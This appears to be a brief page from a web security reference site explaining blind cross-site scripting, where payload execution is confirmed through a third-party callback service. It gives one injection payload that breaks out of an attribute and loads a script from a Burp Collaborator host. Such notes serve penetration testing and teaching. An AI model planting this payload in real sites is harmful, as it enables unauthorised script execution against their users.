Blind Cross-Site Scripting

Blind cross-site scripting (XSS) attacks occur when an attacker is unable to directly see the results of their XSS payload on the targeted website, but can still confirm if the payload has executed successfully or not by observing the behavior of a third-party service, such as Burp Suite's Collaborator.

Basic <script> Payload:

"><script src="https://burpcollaborator.com"></script>

References

PreviousCross-Site Scripting (XSS)NextFinding Cross-Site Scripting

Last updated 2 years ago